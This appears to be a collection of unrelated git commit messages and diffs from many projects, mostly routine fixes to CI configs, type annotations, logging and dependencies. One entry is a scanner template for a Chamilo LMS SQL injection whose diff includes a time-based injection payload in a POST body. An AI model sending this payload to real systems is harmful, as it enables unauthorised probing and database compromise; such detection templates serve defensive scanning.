+ changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
+
almalinux-8:
name: Alma Linux 8
needs:
@@ -269,46 +309,6 @@ jobs:
nox-session: ci-test
changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
- windows-2016:
- name: Windows 2016
- needs:
- - get-changed-files
- uses: ./.github/workflows/test-action.yml
- with:
- distro-slug: windows-2016
- nox-session: ci-test
- changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
-
- windows-2019:
- name: Windows 2019
- needs:
- - get-changed-files
- uses: ./.github/workflows/test-action.yml
- with:
- distro-slug: windows-2019
- nox-session: ci-test
- changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
-
- windows-2022:
- name: Windows 2022
- needs:
- - get-changed-files
- uses: ./.github/workflows/test-action.yml
- with:
- distro-slug: windows-2022
- nox-session: ci-test
- changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
-
- macos-12:
- name: MacOS 12
- needs:
- - get-changed-files
- uses: ./.github/workflows/test-action-macos.yml
- with:
- distro-slug: macos-12
- nox-session: ci-test
- changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
-
set-pipeline-exit-status:
# This step is just so we can make github require this step, to pass checks
|
Update _client.py
Update the type annotation for the default_encoding parameter of AsyncClient's initializer to accept a callable of the form (bytes) -> str. | @@ -1363,7 +1363,7 @@ class AsyncClient(BaseClient):
transport: typing.Optional[AsyncBaseTransport] = None,
app: typing.Optional[typing.Callable] = None,
trust_env: bool = True,
- default_encoding: str = "utf-8",
+ default_encoding: typing.Union[str, typing.Callable[[bytes], str]] = "utf-8",
):
super().__init__(
auth=auth,
|
CentOS6: Fixup using ancient gcc with Nuitka not knowing the option.
* The 4.8 is where I found the option, it may be older, but we don't
care, eventually these old gcc will become unsupported. | @@ -816,7 +816,7 @@ if gcc_mode:
env.Append(CCFLAGS=["-fwrapv"])
# Save some memory for gcc by not tracing macro code locations at all.
- if not debug_mode and not clang_mode:
+ if gcc_version >= "5" and not debug_mode and not clang_mode:
env.Append(CCFLAGS=["-ftrack-macro-expansion=0"])
# Support for clang.
|
Log instead of echo
Write command output to log instead of directly to console | @@ -36,11 +36,11 @@ def report(context, case_id, report_path):
customer, family = case_id.split('-', 1)
existing_case = adapter.case(customer, family)
if existing_case is None:
- click.echo("ERROR: no case found!")
+ LOG.warning("no case found")
context.abort()
existing_case.delivery_report = report_path
existing_case.save()
- click.echo("saved report to case!")
+ LOG.info("saved report to case!")
load.add_command(case_command)
|
fix: Skip review logs
while adding to enegy point logs to docinfo | @@ -140,7 +140,8 @@ def get_comments(doctype, name):
def get_point_logs(doctype, docname):
return frappe.db.get_all('Energy Point Log', filters={
'reference_doctype': doctype,
- 'reference_name': docname
+ 'reference_name': docname,
+ 'type': ['!=', 'Review']
}, fields=['*'])
def _get_communications(doctype, name, start=0, limit=20):
|
Chamilo 1.11.14 LMS sql injection
YAML file is now indented correctly | id: chamilo-lms-sqli
+
info:
author: undefl0w
name: Chamilo LMS SQL Injection
@@ -13,8 +14,7 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- type=image&field_id=image&tag=image&from=image&search=image&options=["test'); SELECT SLEEP(2.5); -- "]
-
+ type=image&field_id=image&tag=image&from=image&search=image&options=["test'); SELECT SLEEP(1.5); -- "]
matchers:
- type: dsl
|
Avoid KeyError: 'multiprocessing'
Fix for | @@ -81,7 +81,7 @@ def _read_proc_file(path, opts):
except IOError:
pass
return None
- if opts['multiprocessing']:
+ if opts.get('multiprocessing'):
if data.get('pid') == pid:
return None
else:
|
pinspect profile: fix display of USE flags and masks
Intersecting overrides shouldn't be shown as either negations or
enables as they cancel each other out.
Also fixes showing all masks for a given profile. Previously some could
be skipped during enumeration causing them to be missing from the output
as well. | @@ -217,27 +217,34 @@ class accept_keywords(_base, metaclass=_register_command):
class _use(_base):
+ def _output_use(self, neg, pos):
+ neg = ('-' + x for x in neg)
+ return ' '.join(sorted(chain(neg, pos)))
+
def __call__(self, namespace, out, err):
global_use = []
- pkg_use = []
+ pkg_use = {}
for k, v in namespace.use.render_to_dict().items():
if isinstance(k, str):
- pkg, neg, pos = v[-1]
- if not isinstance(pkg, atom.atom):
- continue
- neg = ('-' + x for x in neg)
- pkg_use.append((pkg, ' '.join(sorted(chain(neg, pos)))))
+ for pkg, neg, pos in v:
+ if isinstance(pkg, atom.atom):
+ pkg_neg, pkg_pos = pkg_use.setdefault(pkg, (set(), set()))
+ pkg_neg.update(neg)
+ pkg_pos.update(pos)
+ matched = pkg_neg.intersection(pkg_pos)
+ pkg_pos.difference_update(matched)
+ pkg_neg.difference_update(matched)
else:
_, neg, pos = v[0]
- neg = ('-' + x for x in neg)
- global_use = ' '.join(sorted(chain(neg, pos)))
+ global_use = (neg, pos)
if global_use:
- out.write(f'*/*: {global_use}')
+ out.write(f'*/*: {self._output_use(*global_use)}')
if pkg_use:
- for pkg, use in sorted(pkg_use):
- out.write(f'{pkg}: {use}')
+ for pkg, (neg, pos) in sorted(pkg_use.items()):
+ if neg or pos:
+ out.write(f'{pkg}: {self._output_use(neg, pos)}')
class use(_use, metaclass=_register_command):
|
View Asset Dashboard -> View Asset
Summary: Minor thing, but we don't use the phrase "Asset Dashboard" elsewhere in the system.
Test Plan: none
Reviewers: alangenfeld, prha | @@ -283,7 +283,7 @@ const MaterializationContent: React.FC<{
<MetadataEntryLink
to={`/instance/assets/${materialization.assetKey.path.map(encodeURIComponent).join('/')}`}
>
- View Asset Dashboard
+ View Asset
</MetadataEntryLink>
]
</span>
|
Update fill_segments.py
color palette saved=false | @@ -51,7 +51,7 @@ def fill_segments(mask, objects, stem_objects=None):
value=counts[1:].tolist(),
label=(ids[1:]-1).tolist())
- rgb_vals = color_palette(num=len(labels), saved=True)
+ rgb_vals = color_palette(num=len(labels), saved=False)
filled_img = np.zeros((h,w,3), dtype=np.uint8)
for l in labels:
for ch in range(3):
|
Increased resolution in HDF5 data
Increase the resolution of the data saved in the HDF5 files | @@ -722,7 +722,7 @@ class MeasurementControl(Instrument):
'Data', (0, len(self.sweep_functions) +
len(self.detector_function.value_names)),
maxshape=(None, len(self.sweep_functions) +
- len(self.detector_function.value_names)))
+ len(self.detector_function.value_names)), dtype='float64')
self.get_column_names()
self.dset.attrs['column_names'] = h5d.encode_to_utf8(self.column_names)
# Added to tell analysis how to extract the data
|
Python3.4: Some versions in the wild appear to still do it.
* We don't care that much, probably some backported patches,
nothing in the upstream source indicates this. | @@ -239,7 +239,8 @@ class ClassIteratorRejectingThrow:
return next(self.my_iter)
def throw(self, *args):
- assert len(args) == 1
+ # Some Python3.4 versions do normalize exceptions.
+ assert len(args) == 1 or sys.version_info < (3,5)
__next__ = next
|
cache site-packages of virtualenv
This will include the PyTorch installation that would otherwise take about 30 minutes
for compilation. Caching this reduces the build time to less than 3 minutes.
Closes | language: python
python:
- "3.5"
-cache: pip
+cache:
+ directories:
+ - $HOME/virtualenv/python3.5/lib/python3.5/site-packages
before_install:
- sudo apt-get install -y libmpich-dev
- travis_wait 32 ./install-torch.sh
|
fix missleading admin path example
see | @@ -18,7 +18,7 @@ Please check the following list.
## I want to add annotators annotators/annotation approvers
-1. Login to [Django Admin](https://djangobook.com/django-admin-site/) (URL: `/admin`).
+1. Login to [Django Admin](https://djangobook.com/django-admin-site/) (URL: `/admin/`).
2. Add a user to `Users` table (`Add` link).
3. **Logout from Django Admin site.** [You'll face login error without logout of Django Admin site](https://github.com/doccano/doccano/issues/723).
4. Add the user to the project in the member page (`/projects/{project_id}/members`).
|
Irfraction
* Added fraction support to AST.toIR
fraction is an unusual style and takes a lambda
* bug fix | @@ -920,6 +920,24 @@ case class ApplyMethod(posn: Position, lhs: AST, method: String, args: Array[AST
rx <- lhs.toAggIR(agg.get, x => ir.SeqOp(x, ir.I32(0), aggSig))
} yield
ir.ApplyAggOp(rx, FastIndexedSeq(), initOpArgs, aggSig): IR
+ case (t: TAggregable, "fraction", IndexedSeq(Lambda(_, name, body))) =>
+ for {
+ op <- fromOption(
+ this,
+ s"no AggOp for method $method",
+ AggOp.fromString.lift(method))
+ bodyx <- body.toIR()
+ aggSig = AggSignature(op,
+ bodyx.typ,
+ FastIndexedSeq(),
+ None)
+ ca <- fromOption(
+ this,
+ "no CodeAggregator",
+ AggOp.getOption(aggSig))
+ rx <- lhs.toAggIR(agg.get, x => ir.SeqOp(ir.Let(name, x, bodyx), ir.I32(0), aggSig))
+ } yield
+ ir.ApplyAggOp(rx, FastIndexedSeq(), None, aggSig): IR
case (t: TAggregable, _, _) =>
for {
op <- fromOption(
|
BUG: fixed default export_nan
Changed export_nan default to None because an
empty list default will store old values in memory
despite new initialization. | @@ -32,10 +32,11 @@ class Meta(object):
'plot': ('plot', str), 'axis': ('axis', str),
'scale': ('scale', str), 'min_val': ('value_min', float),
'max_val': ('value_max', float), 'fill_val': ('fill', float)})
- export_nan : list
- List of labels that should be exported even if their value is nan. By
- default, metadata with a value of nan will be exluded from export.
- (default=[])
+ export_nan : list or NoneType
+ List of labels that should be exported even if their value is nan or
+ None for an empty list. When used, metadata with a value of nan will
+ be exluded from export. Will always allow nan export for labels of
+ the float type (default=None)
Attributes
----------
@@ -148,14 +149,14 @@ class Meta(object):
'scale': ('scale', str),
'min_val': ('value_min', float),
'max_val': ('value_max', float),
- 'fill_val': ('fill', float)}, export_nan=[]):
+ 'fill_val': ('fill', float)}, export_nan=None):
# Set mutability of Meta attributes. This flag must be set before
# anything else, or `__setattr__` breaks.
self.mutable = True
# Set the NaN export list
- self._export_nan = export_nan
+ self._export_nan = [] if export_nan is None else export_nan
for lvals in labels.values():
if lvals[0] not in self._export_nan and lvals[1] == float:
self._export_nan.append(lvals[0])
@@ -924,26 +925,26 @@ class Meta(object):
# Return the updated Meta class object
return other_updated
- def accept_default_labels(self, other):
+ def accept_default_labels(self, other_meta):
"""Applies labels for default meta labels from other onto self.
Parameters
----------
- other : Meta
+ other_meta : Meta
Meta object to take default labels from
"""
- # update labels in metadata
- for key in other.labels.label_type:
- new_name = getattr(other.labels, key)
+ # Update labels in metadata
+ for key in other_meta.labels.label_type:
+ new_name = getattr(other_meta.labels, key)
old_name = getattr(self.labels, key)
if old_name != new_name:
self._label_setter(new_name, old_name,
- other.labels.label_type[key],
+ other_meta.labels.label_type[key],
use_names_default=True)
- self.labels = other.labels
+ self.labels = other_meta.labels
return
|
Use Spark 2.4.4 in Travis CI
Spark 2.4.4 is released and Apache mirror only contains latest versions.
See, for instance: | @@ -21,7 +21,7 @@ matrix:
env:
- PATH=$(echo "$PATH" | sed -e 's/:\/usr\/local\/lib\/jvm\/openjdk11\/bin//')
- JAVA_HOME=/usr/lib/jvm/java-1.8.0-openjdk-amd64
- - SPARK_VERSION=2.4.3
+ - SPARK_VERSION=2.4.4
- PANDAS_VERSION=0.24.2
- PYARROW_VERSION=0.10.0
- KOALAS_USAGE_LOGGER='databricks.koalas.usage_logging.usage_logger'
@@ -35,7 +35,7 @@ matrix:
env:
- PATH=$(echo "$PATH" | sed -e 's/:\/usr\/local\/lib\/jvm\/openjdk11\/bin//')
- JAVA_HOME=/usr/lib/jvm/java-1.8.0-openjdk-amd64
- - SPARK_VERSION=2.4.3
+ - SPARK_VERSION=2.4.4
- PANDAS_VERSION=0.25.0
- PYARROW_VERSION=0.13.0
|
Restored cache clearing on save
Lost this in | @@ -5740,6 +5740,10 @@ class SQLGlobalAppConfig(models.Model):
})
return model
+ def save(self):
+ LatestAppInfo(self.app_id, self.domain).clear_caches()
+ super().save()
+
class GlobalAppConfig(Document):
pass
|
dvc: fix tqdm dep
tqdm==4.35.0 was throwing KeyError: 'percentage'. | @@ -73,7 +73,7 @@ install_requires = [
"funcy>=1.12",
"pathspec>=0.6.0",
"shortuuid>=0.5.0",
- "tqdm>=4.35.0,<5",
+ "tqdm>=4.36.1,<5",
"packaging>=19.0",
"win-unicode-console>=0.5; sys_platform == 'win32'",
]
|
Enable intersphinx_mapping to PyTorch and domain libraries
This will turn `:py:func:` directives to links to the corresponding API reference. | @@ -66,10 +66,17 @@ rst_epilog ="""
# ones.
extensions = [
'sphinxcontrib.katex',
+ 'sphinx.ext.intersphinx',
'sphinx_copybutton',
'sphinx_gallery.gen_gallery',
]
+intersphinx_mapping = {
+ "torch": ("https://pytorch.org/docs/stable/", None),
+ "torchaudio": ("https://pytorch.org/audio/stable/", None),
+ "torchtext": ("https://pytorch.org/text/stable/", None),
+ "torchvision": ("https://pytorch.org/vision/stable/", None),
+}
# -- Sphinx-gallery configuration --------------------------------------------
|
fix EOS get_bgp_config mismatch between neighbors and peer-group
The peer-group syntax is deprecated since EOS 4.23.0
and replaced by 'peer group'.
OLD: neighbor 192.168.172.36 peer-group 4-public-anycast-peers
NEW: neighbor 192.168.172.36 peer group 4-public-anycast-peers | @@ -1006,6 +1006,10 @@ class EOSDriver(NetworkDriver):
bgp_neighbors[peer_address] = default_neighbor_dict(local_as)
if options[0] == "peer-group":
bgp_neighbors[peer_address]["__group"] = options[1]
+ # EOS > 4.23.0 only supports the new syntax
+ # https://www.arista.com/en/support/advisories-notices/fieldnotices/7097-field-notice-39
+ elif options[0] == "peer" and options[1] == "group":
+ bgp_neighbors[peer_address]["__group"] = options[2]
# in the config, neighbor details are lister after
# the group is specified for the neighbor:
|
Remove tripleo_transfer cleanup.yml reference
With the changes in
this cleanup task file no longer exists. The cleanup
is done within the role automatically via a block/rescue.
Related-Bug:
Related-Bug: rhbz#1904681
Related-Bug: rhbz#1916162
Needed-By: | @@ -338,10 +338,6 @@ outputs:
include_role:
name: tripleo_persist
tasks_from: cleanup.yml
- - name: cleanup tripleo_transfer
- include_role:
- name: tripleo_transfer
- tasks_from: cleanup.yml
update_tasks:
- name: Enforce RHOSP rules regarding subscription.
include_role:
|
Fixed country code and name lookup in Lesson 7 notebook
The country code and name lookup needed to be fixed to match the geojson file. | "metadata": {},
"outputs": [],
"source": [
- "json_layer = GeoJSON(data=json_data, name='Counties', hover_style={'fillColor': 'red' , 'fillOpacity': 0.5})\n",
+ "json_layer = GeoJSON(data=json_data, name='Countries', hover_style={'fillColor': 'red' , 'fillOpacity': 0.5})\n",
"Map.add_layer(json_layer)"
]
},
" html1.value = '''\n",
" <h4>Country code: <b>{}</b></h4>\n",
" Country name: {}\n",
- " '''.format(feature['id'], feature['properties']['name'])\n",
+ " '''.format(feature['properties']['ISO_A2'], feature['properties']['NAME'])\n",
"\n",
"json_layer.on_hover(update_html)"
]
|
Improve message when custom component fails
Improve message when custom component fails during execution. | @@ -55,4 +55,9 @@ phases:
commands:
- |
set -v
- {{ build.TempScript.outputs.stdout }} || (echo 'Script execution failure.' && exit {{ build.Fail.outputs.stdout }})
\ No newline at end of file
+ if {{ build.TempScript.outputs.stdout }} ; then
+ echo 'Script executed successfully'
+ else
+ echo 'ERROR - Script execution failure. Exit code != 0'
+ exit {{ build.Fail.outputs.stdout }}
+ fi
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.